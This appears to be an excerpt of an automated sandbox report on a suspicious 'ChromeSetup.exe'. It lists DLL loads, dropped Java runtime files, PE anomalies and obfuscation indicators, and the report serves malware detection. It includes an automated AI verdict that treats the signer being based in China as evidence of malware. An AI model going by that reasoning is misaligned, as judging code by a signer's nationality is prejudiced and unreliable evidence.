Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Users\user\Desktop\ChromeSetup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ChromeSetup.exe

Static PE information: certificate valid

Source: ChromeSetup.exe

Static file information: File size 81706848 > 1048576

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe

File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcr100.dll

Jump to behavior

Source: ChromeSetup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: msvcr100.i386.pdb source: javaw.exe, 00000002.00000002.3392873090.000000006D031000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\liblcms\lcms.pdb source: lcms.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdb source: javaw.exe, 00000002.00000002.3391820133.000000006CBC7000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libt2k\t2k.pdb source: t2k.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb source: javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, java.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdbic source: javaw.exe, 00000002.00000002.3391820133.000000006CBC7000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: msvcr120.i386.pdb source: javaw.exe, 00000002.00000002.3391610094.000000006CAD1000.00000020.00000001.01000000.0000000F.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb'% source: javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, java.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libzip\zip.pdb source: javaw.exe, 00000002.00000002.3392010694.000000006CC0A000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: msvcp120.i386.pdb source: javaw.exe, 00000002.00000002.3391479640.000000006CA51000.00000020.00000001.01000000.00000010.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb source: javaw.exe, 00000002.00000002.3391040673.000000006BF99000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb8^ source: javaw.exe, 00000002.00000002.3391040673.000000006BF99000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnet\net.pdb source: javaw.exe, 00000002.00000002.3391902623.000000006CBDD000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\Users\devuser\Documents\Visual Studio 2017\Projects\IBuilder\Release\NAct.pdb source: ChromeSetup.exe, 00000000.00000002.1074694666.0000000000420000.00000004.00000001.01000000.00000003.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libbci\bci.pdb source: bci.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libverify\verify.pdb source: javaw.exe, 00000002.00000002.3392205561.000000006CC56000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe, 00000002.00000002.3382359288.00000000005FC000.00000002.00000001.01000000.00000007.sdmp, javaw.exe, 00000002.00000000.1024355035.00000000005FC000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\liblcms\lcms.pdb* source: lcms.dll.0.dr
Source:	Binary string: C:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdb source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp

Data Obfuscation

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\ChromeSetup.exe

Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406328

PE file contains an invalid checksum

Source: NAct.dll.0.dr	Static PE information: real checksum: 0x35f7b should be: 0x3cd72
Source: UAC.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0xde12
Source: uninst.exe.0.dr	Static PE information: real checksum: 0x4debfea should be: 0x2011e

PE file contains sections with non-standard names

Source: Intel_Processor_Identification_Utility-Legacy.exe.0.dr	Static PE information: section name: .didat
Source: jfxwebkit.dll.0.dr	Static PE information: section name: .unwante
Source: prism_sw.dll.0.dr	Static PE information: section name: _RDATA

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_083A326E push 8B6B54CFh; retf

5_2_083A3279

Source: msvcr100.dll.0.dr	Static PE information: section name: .text entropy: 6.90903234258047
Source: msvcr120.dll.0.dr	Static PE information: section name: .text entropy: 6.95576372950548
Source: msvcr100.dll0.0.dr	Static PE information: section name: .text entropy: 6.90903234258047

Persistence and Installation Behavior

AI detected suspicious PE digital signature

Source: Initial sample

Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple suspicious indicators: 1) Company is based in China (Hangzhou) which is a high-risk region for malware origin. 2) Significant temporal inconsistency between compilation date (2012) and certificate issuance (2024), suggesting possible certificate acquisition for an old/legacy code which is suspicious. 3) While the certificate issuer (Certum) is known and the certificate is technically valid, the large time gap (12+ years) between compilation and signing raises red flags about code authenticity and potential compromise. 4) The certificate is relatively new (issued Sept 2024) for a program compiled in 2012, suggesting possible attempt to legitimize old/suspicious code. The combination of Chinese origin, temporal inconsistencies, and attempt to certify very old code creates a high-risk profile.

Drops PE files

Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\rmid.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\client\jvm.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\JavaAccessBridge.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\verify.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jfr.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\plugin2\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\sunmscapi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaws.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jdwp.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\prism_common.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\instrument.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\dt_socket.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\java-rmi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\resource.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\jp2native.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\splashscreen.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javacpl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\eula.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\fxplugins.dll	Jump to dropped file
